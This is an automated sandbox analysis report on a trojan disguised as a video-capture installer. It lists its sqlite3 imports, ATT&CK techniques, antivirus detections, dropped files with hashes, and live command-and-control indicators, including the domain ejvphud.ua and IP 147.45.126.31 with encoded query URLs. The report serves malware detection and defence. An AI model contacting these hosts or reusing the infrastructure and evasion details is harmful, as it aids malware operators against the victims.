Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6092570B: sqlite3_bind_double,sqlite3_mutex_leave
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6095F772: sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_60925778: sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6090577D: sqlite3_bind_parameter_name
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6094B764: sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6090576B: sqlite3_bind_parameter_count
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6094A894: sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6095F883: sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6094C8C2: sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6096281E: sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6096583A: memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6095F9AD: sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6094A92B: sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6090EAE5: sqlite3_transfer_bindings
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6095FB98: sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6095ECA6: sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6095FCCE: sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6095FDAE: sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_60966DF1: sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_60969D75: sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6095FFB2: sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code
MITRE ATT&CK Matrix (entries listed per tactic column in matrix order; a number in front of a technique is the count badge shown in that matrix cell, kept exactly as extracted):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: 2 Native API; 2 Service Execution; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: 1 DLL Side-Loading; 5 Windows Service; 1 Bootkit; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 1 Access Token Manipulation; 5 Windows Service; 12 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 21 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 121 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 12 Process Injection; 1 Bootkit; Dynamic API Resolution; Stripped Payloads
Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: 1 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 35 System Information Discovery; 251 Security Software Discovery; 1 Process Discovery; 121 Virtualization/Sandbox Evasion; 11 Application Window Discovery; 3 System Owner/User Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: 1 Archive Collected Data; 1 Input Capture; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: 2 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 112 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

Source | Detection | Scanner | Label
AbC0LBkVhr.exe | 50% | ReversingLabs | Win32.Ransomware.Socks5Systemz

Source | Detection | Scanner | Label
C:\ProgramData\EShineEncoder\EShineEncoder.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe | 100% | Joe Sandbox ML |
C:\ProgramData\EShineEncoder\EShineEncoder.exe | 79% | ReversingLabs | Win32.Trojan.Ekstak
C:\ProgramData\EShineEncoder\sqlite3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp | 4% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\LTDIS13n.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\bjpeg23.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\gdiplus.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-297HU.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-AK5QD.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-GSMNO.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-MJRUC.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-NF0AU.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-SILBO.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-VECUS.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\ltkrn13n.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\msvcp71.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\msvcr71.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\sqlite3.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\uninstall\is-U1N6A.tmp | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\uninstall\unins000.exe (copy) | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe | 79% | ReversingLabs | Win32.Trojan.Ekstak
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label
http://ejvphud.ua/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 | 0% | Avira URL Cloud | safe
http://147.45.126.31/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df1 | 0% | Avira URL Cloud | safe
http://147.45.126.31/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4 | 0% | Avira URL Cloud | safe
ejvphud.ua | 0% | Avira URL Cloud | safe
http://147.45.126.31/sea | 0% | Avira URL Cloud | safe
http://147.45.126.31/ | 0% | Avira URL Cloud | safe
http://tintguide.com/ru/support.html | 0% | Avira URL Cloud | safe
http://ejvphud.ua/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c443db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfb12c5e894923d | 0% | Avira URL Cloud | safe
http://147.45.126.31/46122658-3693405117-2476756634-1002k | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ejvphud.ua | 147.45.126.31 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://ejvphud.ua/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 | true | Avira URL Cloud: safe | unknown
ejvphud.ua | true | Avira URL Cloud: safe | unknown
http://ejvphud.ua/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c443db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfb12c5e894923d | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.innosetup.com/ | AbC0LBkVhr.tmp, AbC0LBkVhr.tmp, 00000001.00000000.1708006888.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AbC0LBkVhr.tmp.0.dr, is-U1N6A.tmp.1.dr | false | | high
http://tintguide.com/ru/support.html | AbC0LBkVhr.exe, 00000000.00000003.1706758940.0000000002111000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000003.1706685088.0000000002340000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000002.2973496782.0000000002111000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000002.2973434034.000000000051F000.00000004.00000020.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000002.2973924658.0000000002228000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000003.1708897906.0000000003180000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000003.1708982513.0000000002228000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://147.45.126.31/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4 | videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.remobjects.com/psU | AbC0LBkVhr.exe, 00000000.00000003.1707129879.0000000002340000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000003.1707546902.0000000002118000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000000.1708006888.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AbC0LBkVhr.tmp.0.dr, is-U1N6A.tmp.1.dr | false | | high
http://www.remobjects.com/ps | AbC0LBkVhr.exe, 00000000.00000003.1707129879.0000000002340000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000003.1707546902.0000000002118000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, AbC0LBkVhr.tmp, 00000001.00000000.1708006888.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AbC0LBkVhr.tmp.0.dr, is-U1N6A.tmp.1.dr | false | | high
http://147.45.126.31/ | videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://147.45.126.31/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df1 | videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://147.45.126.31/46122658-3693405117-2476756634-1002k | videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://147.45.126.31/sea | videocapturesolution32.exe, 00000004.00000002.2974756897.0000000003619000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
46.8.225.74 | unknown | Russian Federation | 28917 | FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | false
147.45.126.31 | ejvphud.ua | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1576106
                            Start date and time:2024-12-16 14:51:09 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 34s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:AbC0LBkVhr.exe
                            renamed because original name is a hash value
                            Original Sample Name:038c7d5697bfbe553717357809e621bf.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@10/31@1/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 91%
                            • Number of executed functions: 191
                            • Number of non-executed functions: 271
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: AbC0LBkVhr.exe
Time | Type | Description
08:52:40 | API Interceptor | 477574x Sleep call for process: videocapturesolution32.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
46.8.225.74 | KRdh0OaXqH.exe | malicious | Petite Virus, Socks5Systemz
46.8.225.74 | AGcC2uK0El.exe | malicious | Petite Virus, Socks5Systemz
46.8.225.74 | 6hvZpn91O8.exe | malicious | Petite Virus, Socks5Systemz
46.8.225.74 | j9htknb7BQ.exe | malicious | Petite Virus, Socks5Systemz
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | KRdh0OaXqH.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | AGcC2uK0El.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | 6hvZpn91O8.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | j9htknb7BQ.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | b3astmode.arm5.elf | malicious | Mirai | 109.248.108.147
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | reduce.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | InsertSr.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | iKhdG3bwZK.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | ppc.elf | malicious | Mirai | 46.8.228.104
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | file.exe | malicious | Cryptbot | 46.8.237.112
FREE-NET-ASFREEnetEU | amd64.elf | malicious | Unknown | 193.233.202.23
FREE-NET-ASFREEnetEU | TRC.arm.elf | malicious | Mirai | 147.45.45.242
FREE-NET-ASFREEnetEU | htZgRRla8S.exe | malicious | LummaC Stealer | 147.45.44.131
FREE-NET-ASFREEnetEU | Captcha.hta | malicious | LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer | 147.45.44.131
FREE-NET-ASFREEnetEU | Captcha.hta | malicious | HTMLPhisher | 147.45.44.131
FREE-NET-ASFREEnetEU | Captcha.hta | malicious | Cobalt Strike, HTMLPhisher, LummaC Stealer | 147.45.44.131
FREE-NET-ASFREEnetEU | EBUdultKh7.exe | malicious | LummaC Stealer | 147.45.44.131
FREE-NET-ASFREEnetEU | arm5.elf | malicious | Unknown | 193.233.202.23
FREE-NET-ASFREEnetEU | Wh2c6sgwRo.exe | malicious | DCRat, PureLog Stealer, zgRAT | 147.45.47.151
FREE-NET-ASFREEnetEU | installer.exe | malicious | Unknown | 193.233.254.0
No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\EShineEncoder\sqlite3.dll | Oz2UhFBTHy.exe | malicious | Socks5Systemz
C:\ProgramData\EShineEncoder\sqlite3.dll | GEm3o8pION.exe | malicious | Socks5Systemz
C:\ProgramData\EShineEncoder\sqlite3.dll | GEm3o8pION.exe | malicious | Socks5Systemz
C:\ProgramData\EShineEncoder\sqlite3.dll | bzX2pV3Ybw.exe | malicious | Socks5Systemz
C:\ProgramData\EShineEncoder\sqlite3.dll | bzX2pV3Ybw.exe | malicious | Socks5Systemz
C:\ProgramData\EShineEncoder\sqlite3.dll | Ni2ghr9eUJ.exe | malicious | Socks5Systemz
C:\ProgramData\EShineEncoder\sqlite3.dll | Ni2ghr9eUJ.exe | malicious | Socks5Systemz
C:\ProgramData\EShineEncoder\sqlite3.dll | 2mtt3zE6Vh.exe | malicious | Socks5Systemz
C:\ProgramData\EShineEncoder\sqlite3.dll | 2mtt3zE6Vh.exe | malicious | Socks5Systemz
C:\ProgramData\EShineEncoder\sqlite3.dll | 7i6bUvYZ4L.exe | malicious | Socks5Systemz
                                                        Process:C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3281038
                                                        Entropy (8bit):6.6109330082563496
                                                        Encrypted:false
                                                        SSDEEP:98304:hHY4bl5znLaEGzUjIX24RJ4IB//bR6SodyUfalD:hH9l5znLaEGK/Sody9lD
                                                        MD5:F980DB1C4941DE93EA4A88045D20F6D5
                                                        SHA1:990341E89AE748B370CCF38CA167FF9A8D548256
                                                        SHA-256:0325826FD16CEC2AB3F6C56C29B800EBC9E4C33C686BA1D17871B7E3C3091479
                                                        SHA-512:50B31F989AF64CA6EEF354CDAB52041FE0EB5EF3D3BB57295AE9130EE7D50C1172DE921381523E9388524050E1DBB1B1BE3F0D81A7321E9E43CA68C124B67C9C
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\EShineEncoder\EShineEncoder.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L..._..L.....................T...................@..........................p2......z2.....................................T...........`...............................................................................|..........................._rste_2............................. ..`_rstf_2.............................@..@_rstg_2..d... ...0..................@....rsrc................6..............@..@_rsth_2...!..p.... .................`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):645592
                                                        Entropy (8bit):6.50414583238337
                                                        Encrypted:false
                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: Oz2UhFBTHy.exe, Detection: malicious, Browse
                                                        • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                        • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                        • Filename: bzX2pV3Ybw.exe, Detection: malicious, Browse
                                                        • Filename: bzX2pV3Ybw.exe, Detection: malicious, Browse
                                                        • Filename: Ni2ghr9eUJ.exe, Detection: malicious, Browse
                                                        • Filename: Ni2ghr9eUJ.exe, Detection: malicious, Browse
                                                        • Filename: 2mtt3zE6Vh.exe, Detection: malicious, Browse
                                                        • Filename: 2mtt3zE6Vh.exe, Detection: malicious, Browse
                                                        • Filename: 7i6bUvYZ4L.exe, Detection: malicious, Browse
                                                        Reputation:high, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                        Process:C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        File Type:ISO-8859 text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):8
                                                        Entropy (8bit):2.0
                                                        Encrypted:false
                                                        SSDEEP:3:vCXn:aX
                                                        MD5:D783207CFC6F852A3070147771E71B57
                                                        SHA1:2374111D557D0CE2DF48E0F413B03FE93212F1C2
                                                        SHA-256:D596D77F2F9E4A593ECCD664352C81A2B54974E501F136C292317FE03CEC8273
                                                        SHA-512:083985DBED8900DB449819CC105CF23717C5DF468BD4650CCBF1D24FBD4C986D2FB829124DDBDA1CD83893EBA1ADC051663A1202EDF1389425CDE8F9AA77D3D1
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.0`g....
                                                        Process:C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4
                                                        Entropy (8bit):0.8112781244591328
                                                        Encrypted:false
                                                        SSDEEP:3:Y:Y
                                                        MD5:1EBC4541E985D612A5FF7ED2EE92BF3D
                                                        SHA1:BBF9EC5CD7F3ABEB6119901F8E7AB2DCDDDAF1EB
                                                        SHA-256:28276425D45829D4E6F5E18AEFBF1F62862F07260A904532FB6E2106DEC973E6
                                                        SHA-512:658B7C94407138B7113DC15D2E432936409FE1D06961A3DE4DD72D92A47E7F7C93582F9DE57D7F564EB7D905D21D8035A1ACA22873D25A6FCAB88CC42618E876
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:-...
                                                        Process:C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):128
                                                        Entropy (8bit):2.9545817380615236
                                                        Encrypted:false
                                                        SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                        MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                        SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                        SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                        SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                        Malicious:false
                                                        Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                        Process:C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):128
                                                        Entropy (8bit):1.7095628900165245
                                                        Encrypted:false
